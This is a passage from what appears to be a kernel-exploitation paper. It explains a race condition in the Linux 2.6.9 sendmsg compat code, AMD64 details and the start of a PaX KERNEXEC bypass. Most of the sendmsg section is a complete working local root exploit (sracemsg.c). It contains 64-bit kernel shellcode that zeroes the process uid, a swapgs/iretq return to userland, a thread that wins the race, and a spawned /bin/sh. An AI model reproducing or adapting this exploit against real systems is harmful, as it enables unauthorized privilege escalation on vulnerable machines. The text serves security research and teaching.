Since it's quite common for a userland application to repeatedly access
the same disk content/pages (or for different applications to access
common files), the 'Page Cache' noticeably increases performance.


One last thing that we have to discuss is the filesystem 'page clustering'.
Another common principle in 'caching' is 'locality'. Pages near the
referenced one are likely to be accessed in the near future and, since
we're accessing the disk anyway, we can avoid the future seek-rotation
latency if we load in more pages after the referenced one. How many to
load is determined by the page cluster value.

On Linux that value is 3, so 2^3 pages are loaded after the referenced
one. On Solaris, if the pages are 8-kb sized, the next eight pages on a
64kb boundary are brought in by the seg_vn driver (mmap-case).
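
The arithmetic behind the page cluster value can be sketched as follows.
This is only an illustration under our own assumptions : the helper names
'cluster_pages' and 'cluster_bytes' are hypothetical (they are not kernel
functions), and the value 3 is the Linux default quoted above.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper (not a kernel API): number of pages brought in
 * together for a given page cluster value, i.e. 2^page_cluster. */
size_t cluster_pages(unsigned int page_cluster)
{
    /* Keep the shift within the width of size_t. */
    assert(page_cluster < sizeof(size_t) * 8);
    return (size_t)1 << page_cluster;
}

/* Hypothetical helper: bytes covered by one cluster, given the page
 * size in bytes. */
size_t cluster_bytes(unsigned int page_cluster, size_t page_size)
{
    return cluster_pages(page_cluster) * page_size;
}
```

With a cluster value of 3 and 4-kb pages, a single fault can thus pull in
32 kb of file data, which is why a page we want to stay 'cold' must not be
a close neighbour of a page we have just touched.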


Putting it all together, if we want to force a kernel path to sleep we
need to make it reference an un-cached page, so that a 'fault' happens due
to the demand paging implementation. The page fault handler needs to
perform disk I/O, so the process is put to sleep and another one is
selected by the scheduler. Since we probably also want our 'controlled
contents' to be at the faulting address, we need to mmap the pages, modify
them and then exhaust the page cache before making the kernel access them
again.


Filling the 'page cache' also has the effect of consuming a large quantity
of RAM and thus increasing the in/out swapping. On modern operating
systems one can't create a condition of memory pressure only by exhausting
the page cache (as was possible on very old implementations), since
only some amount of RAM is dedicated to the Page Cache and it would keep
on stealing pages from itself, leaving other subsystems free to perform
well. But we can manage to exhaust those subsystems as well, for example
by making the kernel do a large amount of 'surviving' slab-allocations.


Putting the VM under pressure is something to always keep in mind, since,
once that is done, one can manage to slow down the kernel (favouring
races) and make kmalloc or other allocation functions fail (a thing that
seldom happens under normal behaviour).


It is time, now, for another real life situation. We'll show the sendmsg
[5] vulnerability and exploiting code and we'll briefly describe the
details of the AMD64 architecture that are most relevant to exploiting.


---[ 2.4.2 - AMD64 and race condition exploiting: sendmsg 


AMD64 is the 64-bit ’extension’ of the x86 architecture, which is natively 
supported. It supports 64-bit registers, pointers/virtual addresses and 
integer/logic operations. AMD64 has two primary modes of operation, ’Long 
mode’, which is the standard 64-bit one (32-bit and 16-bit binaries can be 
still run with almost no performance impact, or even, if recompiled, with 
some benefit from the extended number of registers, thanks to the 
sometimes-called ’compatibility mode’) and ’Legacy mode’, for 32-bit 
operating systems, which is basically just like having a standard x86 
processor environment. 


Even if we won't use all of them in the sendmsg exploit, we're now going
to sum up a couple of interesting features of the AMD64 architecture :


- The number of general purpose registers has been extended from 8 up to
  16. The registers are all 64-bit long (referred to as 'r[name|num]',
  f.e. rax, r10). Just like what happened with the transition from
  16-bit to 32-bit, the lower 32 bits of the general purpose registers
  are accessible with the 'e' prefix (f.e. eax).


- push/pop on the stack are 64-bit operations, so 8 bytes are
  pushed/popped each time. Pointers are 64-bit too and that allows a
  theoretical virtual address space of 2^64 bytes. As happens for the
  UltraSPARC architecture, current implementations address a limited
  virtual address space (2^48 bytes) and thus have a VA-hole (the least
  significant 48 bits are used and bits from 48 up to 63 must be copies
  of bit 47 : the hole is thus between 0x7FFFFFFFFFFF and
  0xFFFF800000000000).

  This limitation is strictly implementation-dependent, so any future
  implementation might take advantage of the full 2^64 bytes range.


- It is now possible to reference data relative to the Instruction
  Pointer register (RIP). This is both good and bad news, since it
  makes writing position independent (shell)code easier, but also makes
  it more efficient (opening the way for more performant PIE-alike
  implementations).


- The (in)famous NX bit (bit 63 of the page table entry) is implemented
  and so pages can be marked as No-Exec by the operating system. This is
  less of an issue than on UltraSPARC since there's actually no operating
  system which implements a separated userspace/kernelspace addressing,
  thus leaving room for the use of the 'return-to-userspace' technique.


- AMD64 doesn't support anymore (in 'long mode') the use of
  segmentation. This choice makes harder, in our opinion, the creation
  of a separated user/kernel address space. Moreover the FS and GS
  registers are still used for different purposes. As we'll see, the
  Linux Operating System keeps the GS register pointing to the 'current'
  PDA (Per Processor Data Structure). (check : /include/asm-x86_64/pda.h
  struct x8664_pda .. anyway we'll get back to that shortly).
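
The 'VA-hole' rule from the list above (bits 48 up to 63 must be copies of
bit 47) can be checked with a few lines of C. This is just a sketch : the
function name 'is_canonical' and its 'va_bits' parameter are our own
illustrative choices, with 48 being the implemented width quoted in the
text.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Sketch: returns true when every bit from (va_bits - 1) up to 63 has
 * the same value, i.e. the address lies outside the VA-hole.
 * va_bits is the number of implemented virtual address bits. */
bool is_canonical(uint64_t va, unsigned int va_bits)
{
    assert(va_bits >= 1 && va_bits <= 64);

    /* Keep only the top implemented bit and everything above it. */
    uint64_t upper    = va >> (va_bits - 1);
    uint64_t all_ones = UINT64_MAX >> (va_bits - 1);

    /* Either all zero (lower half) or all one (upper half). */
    return upper == 0 || upper == all_ones;
}
```

With va_bits set to 48, 0x00007FFFFFFFFFFF and 0xFFFF800000000000 are
accepted, while 0x0000800000000000 (the first address inside the hole) is
rejected.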


After this brief summary (if you want to learn more about the AMD64
architecture you can check the reference manuals at [3]) it is now time to
focus on the 'real vulnerability', the sendmsg [5] one :


 "When we copy 32bit ->msg_control contents to kernel, we walk the
  same userland data twice without sanity checks on the second pass.
  Moreover, if original looks small enough, we end up copying to on-stack
  array."


< linux-2.6.9/net/compat.c >


int cmsghdr_from_user_compat_to_kern(struct msghdr *kmsg,
                unsigned char *stackbuf, int stackbuf_size)
{
        struct compat_cmsghdr __user *ucmsg;
        struct cmsghdr *kcmsg, *kcmsg_base;
        compat_size_t ucmlen;
        __kernel_size_t kcmlen, tmp;

        kcmlen = 0;
        kcmsg_base = kcmsg = (struct cmsghdr *)stackbuf;       [1]
[...]
        while(ucmsg != NULL) {
                if(get_user(ucmlen, &ucmsg->cmsg_len))         [2]
                        return -EFAULT;

                /* Catch bogons. */
                if(CMSG_COMPAT_ALIGN(ucmlen) <
                   CMSG_COMPAT_ALIGN(sizeof(struct compat_cmsghdr)))
                        return -EINVAL;
                if((unsigned long)(((char __user *)ucmsg -
                                    (char __user *)kmsg->msg_control)
                                   + ucmlen) > kmsg->msg_controllen) [3]
                        return -EINVAL;

                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmlen += tmp;                                 [4]
                ucmsg = cmsg_compat_nxthdr(kmsg, ucmsg, ucmlen);
        }
[...]
        if(kcmlen > stackbuf_size)                             [5]
                kcmsg_base = kcmsg = kmalloc(kcmlen, GFP_KERNEL);

        while(ucmsg != NULL) {
                __get_user(ucmlen, &ucmsg->cmsg_len);          [6]
                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmsg->cmsg_len = tmp;
                __get_user(kcmsg->cmsg_level, &ucmsg->cmsg_level);
                __get_user(kcmsg->cmsg_type, &ucmsg->cmsg_type);

                /* Copy over the data. */
                if(copy_from_user(CMSG_DATA(kcmsg),            [7]
                                  CMSG_COMPAT_DATA(ucmsg),
                                  (ucmlen -
                                   CMSG_COMPAT_ALIGN(sizeof(*ucmsg)))))
                        goto out_free_efault;
[...]

< / >


As is said in the advisory, the vulnerability is a double-reference to
some userland data (at [2] and at [6]) without sanitizing the value the
second time it is fetched from userland (at [3] the check is performed,
instead). That 'data' is the 'size' of the user-part to copy-in
('ucmlen'), and it's used, at [7], inside the copy_from_user.
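
The double-reference pattern can be modelled entirely in userland. The
sketch below is not kernel code : 'struct fake_user_hdr', the hook type
and all function names are hypothetical, and the 'racing thread' is
replaced by a callback invoked inside the window, so that the outcome is
deterministic.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the user-controlled header (not a kernel
 * type). */
struct fake_user_hdr {
    volatile uint32_t len;
};

/* Callback that plays the role of the racing thread. */
typedef void (*race_hook_t)(struct fake_user_hdr *);

/* Vulnerable pattern: the length is checked on the first fetch, then
 * fetched again and used unchecked. Returns the length that would
 * reach the copy, or -1 if the check rejects it. */
long double_fetch_len(struct fake_user_hdr *u, uint32_t limit,
                      race_hook_t hook)
{
    assert(u != NULL);
    uint32_t checked = u->len;      /* first fetch, as at [2] */
    if (checked > limit)            /* sanity check, as at [3] */
        return -1;
    if (hook)
        hook(u);                    /* the window the racer uses */
    return (long)u->len;            /* second fetch, as at [6] */
}

/* Safe pattern: fetch once and keep using the validated copy. */
long single_fetch_len(struct fake_user_hdr *u, uint32_t limit,
                      race_hook_t hook)
{
    assert(u != NULL);
    uint32_t checked = u->len;
    if (checked > limit)
        return -1;
    if (hook)
        hook(u);                    /* the racer runs, but too late */
    return (long)checked;
}

/* Example racer: rewrites the length after it has been validated. */
void racer_set_500(struct fake_user_hdr *u)
{
    u->len = 500;
}
```

The only difference between the two functions is which value reaches the
copy : the re-fetched one or the validated one. The usual fix for this
class of bug is to copy the user data once and work on the kernel copy.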


This is a pretty common scenario for a race condition : if we create two
different threads, make the first one enter the codepath and, after [4],
we manage to put it to sleep and make the scheduler choose the other
thread, we can change the 'ucmlen' value and thus perform a 'buffer
overflow'.


The kind of overflow we're going to perform is 'decided' at [5] : if the
len is little, the buffer used will be on the stack, otherwise it will be
kmalloc'ed. Both situations are exploitable, but we've chosen the stack
based one (we have already presented a slab exploit for the Linux
operating system before). We're going to use, inside the exploit, the
technique we've presented in the previous subsection to force a process to
sleep, that is making it access data across a page boundary (with the
second page never referenced before nor already swapped in by the page
clustering mechanism).


   +------------+ --------> 0x20020000 [MMAP_ADDR + 32 * PAGE_SIZE] [*]
   |            |
   | cmsg_len   |     first cmsg_len starts at 0x2001fff4
   | cmsg_level |     first struct compat_cmsghdr
   | cmsg_type  |
   |            |
   |------------| --------> 0x20020000 [cross page boundary]
   | cmsg_len   |     second cmsg_len starts at 0x20020000
   | cmsg_level |     second struct compat_cmsghdr
   | cmsg_type  |
   |            |
   +------------+ --------> 0x20021000

[*] One of those so-called 'runtime adjustments'. The page clustering
    wasn't showing the expected behaviour in the first 32 mmaped-pages,
    while it was working just as expected after them.
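
The addresses in the layout above follow from simple arithmetic, sketched
here. The helper names are hypothetical, and the 12-byte header size is an
assumption (three 4-byte fields, as seen by a 32-bit process); it is
consistent with the 0x2001fff4 address shown in the layout.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000u

/* Hypothetical helper: start address of a header of hdr_size bytes
 * placed so that it ends exactly where page number page_index of the
 * mapping begins. */
uint32_t header_before_page(uint32_t map_base, uint32_t page_index,
                            uint32_t hdr_size)
{
    uint32_t boundary = map_base + page_index * PAGE_SIZE;
    /* The header must fit between the mapping base and the boundary. */
    assert(hdr_size <= boundary - map_base);
    return boundary - hdr_size;
}

/* Hypothetical helper: base address of the page containing addr. */
uint32_t page_of(uint32_t addr)
{
    return addr & ~(PAGE_SIZE - 1);
}
```

With a mapping base of 0x20000000, page index 32 and a 12-byte header, the
first header starts at 0x2001fff4 and the second one at 0x20020000 : the
two live on different pages, so reading the second header is what can
trigger the fault.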


As we said, we're going to perform a stack-based exploitation, writing
past the 'stackbuf' variable. Let's see where we get it from :


< linux-2.6.9/net/socket.c >


asmlinkage long sys_sendmsg(int fd, struct msghdr __user *msg,
                            unsigned flags)
{
        struct compat_msghdr __user *msg_compat =
                                (struct compat_msghdr __user *)msg;
        struct socket *sock;
        char address[MAX_SOCK_ADDR];
        struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
        unsigned char ctl[sizeof(struct cmsghdr) + 20];
        unsigned char *ctl_buf = ctl;
        struct msghdr msg_sys;
        int err, ctl_len, iov_size, total_len;

        if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
                err = cmsghdr_from_user_compat_to_kern(&msg_sys,
                                                       ctl, sizeof(ctl));
[...]

< / >

The situation is less nasty than it seems (at least on the systems we
tested the code on) : thanks to gcc reordering the stack variables we get
our 'msg_sys' struct placed as if it was the first variable.
That simplifies our exploiting task a lot, since we don't have to take
care of 'emulating' in userspace the structures referenced between our
overflow and the 'return' of the function (for example the struct sock).
Exploiting in this 'second case' would be slightly more complex, but
doable as well.


The shellcode for the exploit is not much different (as expected, since
AMD64 is a 'superset' of the x86 architecture) from the ones provided
before for the Linux/x86 environment; nevertheless we have to focus on two
important different points : the 'thread/task struct dereference' and the
'userspace context switch approach'.


For the first point, let's start by analyzing the get_current()
implementation :


< linux-2.6.9/include/asm-x86_64/current.h >


#include <asm/pda.h>

static inline struct task_struct *get_current(void)
{
        struct task_struct *t = read_pda(pcurrent);
        return t;
}

#define current get_current()

#define GET_CURRENT(reg) movq %gs:(pda_pcurrent),reg

< / >


< linux-2.6.9/include/asm-x86_64/pda.h >


struct x8664_pda {
        struct task_struct *pcurrent;   /* Current process */
        unsigned long data_offset;      /* Per cpu data offset from linker
                                           address */
        struct x8664_pda *me;           /* Pointer to itself */
        unsigned long kernelstack;      /* top of kernel stack for current */
[...]

#define pda_from_op(op,field) ({ \
       typedef typeof_field(struct x8664_pda, field) T__; T__ ret__; \
       switch (sizeof_field(struct x8664_pda, field)) { \
case 2: \
asm volatile(op "w %%gs:%P1,%0":"=r" (ret__):"i"(pda_offset(field)):"memory"); break;\
[...]

#define read_pda(field) pda_from_op("mov",field)

< / >


The task_struct is thus no longer in the 'current stack' (more precisely,
referenced from the thread_struct which is actually saved in the
'current stack'), but is stored in the 'struct x8664_pda'. This struct
keeps a lot of information relative to the 'current' process and the CPU
it is running on (kernel stack address, irq nesting counter, cpu it is
running on, number of NMI on that cpu, etc).

As you can see from the 'pda_from_op' macro, during the execution of a
Kernel Path, the address of the 'struct x8664_pda' is kept inside the %gs
register. Moreover, the 'pcurrent' member (which is the one we're actually
interested in) is the first one, so obtaining it from inside a shellcode
is just a matter of doing a :

  movq %gs:0x0, %rax

From that point on the 'scanning' to locate uid/gid/etc is just the same
used in the previously shown exploits.


The second point which quite differs from the x86 case is the 'restore'
part (which is, also, a direct consequence of the use of %gs).

First of all we have to do a '64-bit based' restore, that is we have to
push the 64-bit values of RIP, CS, RFLAGS, RSP and SS and call, at the
end, the 'iretq' instruction (the extended version of the 'iret' one on
x86).

Just before returning we have to remember to perform the 'swapgs'
instruction, which swaps the %gs content with the one of the KernelGSbase
(MSR address C000_0102h).

If we don't perform the gs restoring, at the next syscall or interrupt the
kernel will use an invalid value for the gs register and will just crash.
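
The frame that 'iretq' consumes can be described with a plain C struct.
This is an illustrative sketch : the struct and function names are ours,
while the selector and flag values (0x23, 0x2b, 0x246) are the ones that
appear in the shellcode of this section.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Layout of the five 64-bit slots popped by iretq, lowest address
 * first (offsets relative to %rsp at the time of the iretq). */
struct iretq_frame {
    uint64_t rip;       /* 0x00: userland instruction pointer */
    uint64_t cs;        /* 0x08: code segment selector */
    uint64_t rflags;    /* 0x10: flags register */
    uint64_t rsp;       /* 0x18: userland stack pointer */
    uint64_t ss;        /* 0x20: stack segment selector */
};

/* Hypothetical helper: fill a frame for returning to a 32-bit
 * userland process, using the constants from the shellcode. */
struct iretq_frame make_user_frame(uint64_t rip, uint64_t rsp)
{
    struct iretq_frame f;

    /* Five 8-byte slots, no padding expected. */
    assert(sizeof(struct iretq_frame) == 5 * sizeof(uint64_t));

    f.rip    = rip;
    f.cs     = 0x23;    /* 32-bit user code segment */
    f.rflags = 0x246;
    f.rsp    = rsp;
    f.ss     = 0x2b;    /* user stack segment */
    return f;
}
```

The offsets of the members match the displacements (0x0, 0x8, 0x10, 0x18,
0x20) used by the 'movq' instructions that prepare the stack right before
the 'iretq'.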


Here's the shellcode in asm inline notation :


void stub64bit()
{
asm volatile (
                "movl %0, %%esi\t\n"
                "movq %%gs:0, %%rax\n"
                "xor %%ecx, %%ecx\t\n"
                "1: cmp $0x12c, %%ecx\t\n"
                "je 4f\t\n"
                "movl (%%rax), %%edx\t\n"
                "cmpl %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "movl 0x4(%%rax),%%edx\t\n"
                "cmp %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "xor %%edx, %%edx\t\n"
                "movl %%edx, 0x4(%%rax)\t\n"
                "jmp 4f\t\n"
                "3: add $4,%%rax\t\n"
                "inc %%ecx\t\n"
                "jmp 1b\t\n"
                "4:\t\n"
                "swapgs\t\n"
                "movq $0x000000000000002b,0x20(%%rsp)\t\n"
                "movq %1,0x18(%%rsp)\t\n"
                "movq $0x0000000000000246,0x10(%%rsp)\t\n"
                "movq $0x0000000000000023,0x8(%%rsp)\t\n"
                "movq %2,0x0(%%rsp)\t\n"
                "iretq\t\n"
                : : "i"(UID), "i"(STACK_OFFSET), "i"(CODE_OFFSET)
                );
}


With UID being the 'uid' of the current running process and STACK_OFFSET
and CODE_OFFSET the address of the stack and code 'segment' we're
returning into in userspace. All those values are taken and patched at
runtime in the exploit 'make_kjump' function :


< stuff/expl/linux/sracemsg.c >


#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define STACK_OFF_OFFSET 69
#define CODE_OFF_OFFSET  95

[...]

int make_kjump(void)
{
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
      PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
      PROT_READ|PROT_WRITE|PROT_EXEC,
      MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);

  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
  PATCH_CODE(MMAP_NULL, STACK_OFF_OFFSET, 0x11111111);
  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET, &eip_do_exit);
}

< / >


The rest of the exploit should be quite self-explanatory and we're going
to show the code shortly. Note the lowering of the priority inside
start_thread_priority ('nice(19)'), so that we have some more chance to
win the race (the 'glob_race' variable works just like a spinning lock
for the main thread - check 'race_func()').


As a last note, we use the 'rdtsc' (read time stamp counter) instruction
to calculate the time that elapsed while trying to win the race. If
this gap is high it is quite probable that a scheduling happened.

The task of 'flushing all pages' (inside the page cache), so that we'll be
sure that we'll end up using demand paging on the cross boundary access,
is not implemented inside the code (it could have been easily added) and
is left to the exploit runner. Since we have to create the file with
controlled data, those pages end up cached in the page cache. We have to
force the subsystem into discarding them. It shouldn't be hard for you, if
you followed the discussion so far, to perform tasks that would 'flush the
needed pages' (to disk) or add code to automate it. (hint : mass find &
cat * > /dev/null is an idea).


Last but not least, since the vulnerable function is inside 'compat.c',
which is the 'compatibility mode' to run 32-bit based binaries, remember to
compile the exploit with the -m32 flag.


< stuff/expl/linux/sracemsg.c >


#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/socket.h>

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define STACK_OFF_OFFSET 69
#define CODE_OFF_OFFSET  95

char kernel_stub[] =

"\xbe\xe8\x03\x00\x00"                 /* mov  $0x3e8,%esi            */
"\x65\x48\x8b\x04\x25\x00\x00\x00\x00" /* mov  %gs:0x0,%rax           */
"\x31\xc9"                             /* xor  %ecx,%ecx  (15         */
"\x81\xf9\x2c\x01\x00\x00"             /* cmp  $0x12c,%ecx            */
"\x74\x1c"                             /* je   400af0 <stub64bit+0x38> */
"\x8b\x10"                             /* mov  (%rax),%edx            */
"\x39\xf2"                             /* cmp  %esi,%edx              */
"\x75\x0e"                             /* jne  400ae8 <stub64bit+0x30> */
"\x8b\x50\x04"                         /* mov  0x4(%rax),%edx         */
"\x39\xf2"                             /* cmp  %esi,%edx              */
"\x75\x07"                             /* jne  400ae8 <stub64bit+0x30> */
"\x31\xd2"                             /* xor  %edx,%edx              */
"\x89\x50\x04"                         /* mov  %edx,0x4(%rax)         */
"\xeb\x08"                             /* jmp  400af0 <stub64bit+0x38> */
"\x48\x83\xc0\x04"                     /* add  $0x4,%rax              */
"\xff\xc1"                             /* inc  %ecx                   */
"\xeb\xdc"                             /* jmp  400acc <stub64bit+0x14> */
"\x0f\x01\xf8"                         /* swapgs  (54                 */
"\x48\xc7\x44\x24\x20\x2b\x00\x00\x00" /* movq $0x2b,0x20(%rsp)       */
"\x48\xc7\x44\x24\x18\x11\x11\x11\x11" /* movq $0x11111111,0x18(%rsp) */
"\x48\xc7\x44\x24\x10\x46\x02\x00\x00" /* movq $0x246,0x10(%rsp)      */
"\x48\xc7\x44\x24\x08\x23\x00\x00\x00" /* movq $0x23,0x8(%rsp)        */
                                       /* 23 32-bit , 33 64-bit cs    */
"\x48\xc7\x04\x24\x22\x22\x22\x22"     /* movq $0x22222222,(%rsp)     */
"\x48\xcf";                            /* iretq                       */


void eip_do_exit(void)
{
  char *argvx[] = {"/bin/sh", NULL};
  printf("uid=%d\n", geteuid());
  execve("/bin/sh", argvx, NULL);
  exit(1);
}


/*
 * This function maps stack and code segment
 * - 0x0000000000000000 - 0x0000000000001000   (future code space)
 * - 0x0000000011110000 - 0x0000000011112000   (future stack space)
 */

int make_kjump(void)
{
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
      PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
      PROT_READ|PROT_WRITE|PROT_EXEC,
      MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);

  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
  PATCH_CODE(MMAP_NULL, STACK_OFF_OFFSET, 0x11111111);
  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET, &eip_do_exit);
  return 0;
}

int start_thread_priority(int (*f)(void *), void* arg)
{
  char *stack = malloc(PAGE_SIZE*4);
  int tid = clone(f, stack + PAGE_SIZE*4 -4,
      CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);
  if(tid < 0)
    fatal_errno("clone", 1);

  nice(19);
  sleep(1);
  return tid;
}

int race_func(void* noarg)
{
  printf("[*] thread racer getpid()=%d\n", getpid());
  while(1)
  {
    if(glob_race)
    {
      g_ancillary->cmsg_len = 500;
      return 0;
    }
  }
}

uint64_t tsc()
{
  uint64_t ret;
  asm volatile("rdtsc" : "=A"(ret));

  return ret;
}

struct tsc_stamp
{
  uint64_t before;
  uint64_t after;
  uint32_t access;
};


struct tsc_stamp stamp[128];

inline char *flat_file_mmap(int fs)
{
  void *addr = mmap(MMAP_ADDR, PAGE_SIZE*PAGE_NUM, PROT_READ|PROT_WRITE,
      MAP_SHARED|MAP_FIXED, fs, 0);
  if(addr == MAP_FAILED)
    fatal_errno("mmap", 1);
  return (char*)addr;
}

void scan_addr(char *memory)
{
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
  {
    stamp[i].access = (uint32_t)(memory + i*PAGE_SIZE);
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE-4));
    stamp[i].before = tsc();
    dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
    stamp[i].after  = tsc();
  }
}

/* make code access first 32 pages to flush page-cluster */
/* access: 0x20000000 - 0x2000XXXX */

void start_flush_access(char *memory, uint32_t page_num)
{
  int i;
  for(i=0; i<page_num; i++)
  {
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
  }
}

void print_single_result(struct tsc_stamp *entry)
{
  printf("Accessing: %p, tsc-difference: %lld\n", entry->access,
      entry->after - entry->before);
}

void print_result()
{
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
  {
    printf("Accessing: %p, tsc-difference: %lld\n", stamp[i].access,
        stamp[i].after - stamp[i].before);
  }
}

void fill_ancillary(struct msghdr *msg, char *ancillary)
{
  msg->msg_control = ((ancillary + 32*PAGE_SIZE) -
                      sizeof(struct cmsghdr));
  msg->msg_controllen = sizeof(struct cmsghdr) * 2;

  /* set global var thread race ancillary data chunk */
  g_ancillary = msg->msg_control;

  struct cmsghdr* tmp = (struct cmsghdr *)(msg->msg_control);
  tmp->cmsg_len = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type = 0;
  tmp++;

  tmp->cmsg_len = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type = 0;
  tmp++;

  memset(tmp, 0x00, 172);
}


int main()
{
  struct tsc_stamp single_stamp = {0};
  struct msghdr msg = {0};

  memset(&stamp, 0x00, sizeof(stamp));
  int fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);

  char *addr = flat_file_mmap(fd);

  fill_ancillary(&msg, addr);

  munmap(addr, PAGE_SIZE*PAGE_NUM);
  close(fd);
  make_kjump();
  sync();

  printf("Flush all pages and press a enter:)\n");
  getchar();

  fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);
  addr = flat_file_mmap(fd);

  int t_pid = start_thread_priority(race_func, NULL);
  printf("[*] thread main getpid()=%d\n", getpid());

  start_flush_access(addr, 32);

  int sc[2];
  int sp_ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sc);
  if(sp_ret < 0)
    fatal_errno("socketpair", 1);

  single_stamp.access = (uint32_t)g_ancillary;
  single_stamp.before = tsc();

  glob_race = 1;
  sendmsg(sc[0], &msg, 0);

  single_stamp.after = tsc();
  print_single_result(&single_stamp);
  kill(t_pid, SIGKILL);

  munmap(addr, PAGE_SIZE*PAGE_NUM);
  close(fd);
  return 0;
}

< / >


------[ 3 - Advanced scenarios


In an attempt to 'complete' our treatment of kernel exploiting we're
now going to discuss two 'advanced scenarios' : a stack based kernel
exploit capable of bypassing PaX [18] KERNEXEC and the Userland /
Kernelland split, and an effective remote exploit, both for the Linux
kernel.


---[ 3.1 - PaX KERNEXEC & separated kernel/user space 


The PaX KERNEXEC option emulates a no-exec bit for pages in kernel land
on an architecture which doesn't have it (x86), while the User / Kernel
Land split blocks the 'return-to-userland' approach that we have
extensively described and used in the paper. With those two protections
active we're basically facing the same scenario we encountered discussing
the Solaris/SPARC environment, so we won't go into more detail here (to
avoid duplicating the discussion).


This time, though, we won't have any executable and controllable memory
area (no u_psargs array), and we're going to present a different technique
which doesn't require one. Even if the idea behind it applies well to any
no-exec and separated kernel/userspace environment, as we'll see shortly,
this approach is quite architecture (stack management and function
call/return implementation) and Operating System (handling of credentials)
specific.


Moreover, it requires a precise knowledge of the .text layout of the
running kernel, so at least a readable image (which is the default
situation on many distros, on Solaris, and on other operating systems we
checked) or a large or controlled infoleak is necessary.


The idea behind it is not much different from the theory behind
'ret-into-libc' or other userland exploiting approaches that attempt to
circumvent the non executability of heap and stack : as we know, Linux
associates credentials to each process in terms of numeric values :


< linux-2.6.15/include/linux/sched.h > 


struct task_struct { 

[...]

/* process credentials */ 
uid_t uid, euid, suid, fsuid; 
gid_t gid, egid, sgid, fsgid; 


Sometimes a process needs to raise (or drop, for security reasons) its 
credentials, so the kernel exports systemcalls to do that. 
One of those is sys_setuid 


< linux-2.6.15/kernel/sys.c >


asmlinkage long sys_setuid(uid_t uid)
{
        int old_euid = current->euid;
        int old_ruid, old_suid, new_ruid, new_suid;
        int retval;

        retval = security_task_setuid(uid, (uid_t)-1, (uid_t)-1,
                                      LSM_SETID_ID);
        if (retval)
                return retval;

        old_ruid = new_ruid = current->uid;
        old_suid = current->suid;
        new_suid = old_suid;

        if (capable(CAP_SETUID)) {                                   [1]
                if (uid != old_ruid &&
                    set_user(uid, old_euid != uid) < 0)
                        return -EAGAIN;
                new_suid = uid;
        } else if ((uid != current->uid) && (uid != new_suid))
                return -EPERM;

        if (old_euid != uid)
        {
                current->mm->dumpable = suid_dumpable;
                smp_wmb();
        }
        current->fsuid = current->euid = uid;                        [2]
        current->suid = new_suid;

        key_fsuid_changed(current);
        proc_id_connector(current, PROC_EVENT_UID);

        return security_task_post_setuid(old_ruid, old_euid, old_suid,
                                         LSM_SETID_ID);
}

< / >


As you can see, the ’security’ checks (out of the LSM security_* entry 
points) are performed at [1] and after those, at [2] the values of fsuid 
and euid are set equal to the value passed to the function. 


